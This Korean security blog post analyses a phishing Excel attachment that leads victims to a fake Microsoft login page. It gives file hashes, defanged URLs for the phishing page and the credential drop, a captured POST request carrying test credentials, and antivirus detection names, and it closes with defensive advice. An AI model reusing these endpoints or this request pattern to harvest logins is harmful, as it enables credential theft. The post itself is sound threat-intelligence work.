오늘은 피싱(Phishing)개인정보(Private data)를 낚는다(Fishing)는 의미의 합성어로 간단하게 이야기하면 공신력 있는 사이트라고 속여서 개인정보를 수집해 가는 악성 행위 중 하나입니다. 마이크로소프트 계정 훔치기 위한 피싱 엑셀 문서인 Statement001.xlsx에 대해 글을 적어 보겠습니다.
먼저 해당 악성코드 해쉬값은 다음과 같습니다.
파일명:Excel Statement001.xlsx
사이즈:124 KB
CRC32:ff54a91e
MD5:0c2064fef98c4c647bb325827a2e2576
SHA-1:af4dcff799c5233aa28f950c11b938e32e4f49b9
SHA-256:58e6856571868d55dbfd636710ac2590c574589c7609402d5f7cdba17ba78653
SHA-512:548d6b7850b398dc02f9ff5d457e12344ddf7add5cb16cebdd75d7cbe5abe305fca73973857967ef30817f055453c9c1d81af11879647d37454b5012d0129554
일단 해당 엑셀을 실행하고 나며 어도비 리더 같은 그림이 있는 View 를 통해서 해당 피싱 사이트로 이동을 합니다.
피싱 사이트 주소는 다음과 같습니다.
https://gripaco(.)gr/e-doc.html
이며 접속을 해 보면 마이크로소프트 계정을 통해서 오피스를 접속을 하게 돼 있으나 실상은 피싱 사이트 이며 다음 주소를 통해서 개인정보를 전송합니다.
https://resourcesxerox(.)com/gh05t/reform/def.php
더 자세하게 이야기하면 다음과 같습니다.
POST /gh05t/reform/def(.)php HTTP/1.1
Host: resourcesxerox(.)com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Prefer: safe
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://gripaco(.)gr
DNT: 1
Connection: keep-alive
Referer: https://gripaco(.)gr/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Accept-Encoding: gzip, deflate
Content-Length: 32
ai=test%40test(.)com&pr=test1231242023-03-27 18:44:43 UTC 기준으로 바이러스토탈(VirusTotal)에서는 다음과 같이 해당 피싱 문서를 탐지하고 있습니다.
Antiy-AVL:Trojan[Phishing]/MSOffice.Agent
Arcabit:Trojan.Generic.D3EF9E3B
Avast:Other:Malware-gen [Trj]
AVG:Other:Malware-gen [Trj]
Avira (no cloud)PHISH/MSDoc.uytna
BitDefender:Trojan.GenericKD.66035259
Cynet:Malicious (score: 99)
Emsisoft:Trojan.GenericKD.66035259 (B)
eScan:Trojan.GenericKD.66035259
ESET-NOD32:DOC/Phishing.Agent.TA
GData:Trojan.GenericKD.66035259
Google:Detected
Ikarus:Phishing.Office.Doc
Kaspersky:HEUR:Hoax.MSOffice.Phish.gen
Lionic:Hacktool.MSExcel.Phish.3!c
MAX:Malware (ai Score=84)
McAfee-GW-Edition:Artemis
Tencent:Trojan.Win32.Office_Dl.11026087
Trellix (FireEye):Trojan.GenericKD.66035259
VIPRE:Trojan.GenericKD.66035259
ZoneAlarm by Check Point:HEUR:Hoax.MSOffice.Phish.gen
해당 피싱 사이트들도 기본적으로 잘 탐지 하고 있기 때문에 기본적으로 브라우저에서 제공하는 보안 기능과 그리고 백신 프로그램(안티바이러스)에서 사용을 하는 피싱 사이트 차단기능을 사용하고 항상 최신 업데이트로 유지하는 습관을 가지면 어느 정도 피해는 줄일 수가 있습니다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| 네이버 피싱 메일-새로운 일회용 비밀번호가 생성되었습니다. 분석(2023.04.04) (0) | 2023.04.05 |
|---|---|
| 페덱스 로 위장 하고 있는 피싱 메일-[페덱스] 수입면장 안내!.(2023.3.31) (0) | 2023.04.04 |
| 3CX 공격에 악용된 옵트인 레지스터리 수정 방법 (0) | 2023.04.03 |
| Steam(스팀) 윈도우7,윈도우 8 대한 지원 2024년1월1일 까지 (0) | 2023.03.31 |
| 북한 김수키(Kimsuky)에서 만든 악성코드-DDD.html(2023.03.27) (0) | 2023.03.29 |
| 구글 크롬 ChatGPT 로 위장 하고 있는 악성 부가기능-Chat GPT For Google(2023.03.25) (2) | 2023.03.28 |
| 윈도우 11 캡처 및 스케치 OOB 보안 업데이트 (0) | 2023.03.27 |
| Microsoft Edge(마이크로소프트 엣지)111.0.1661.54 보안 업데이트 (0) | 2023.03.27 |
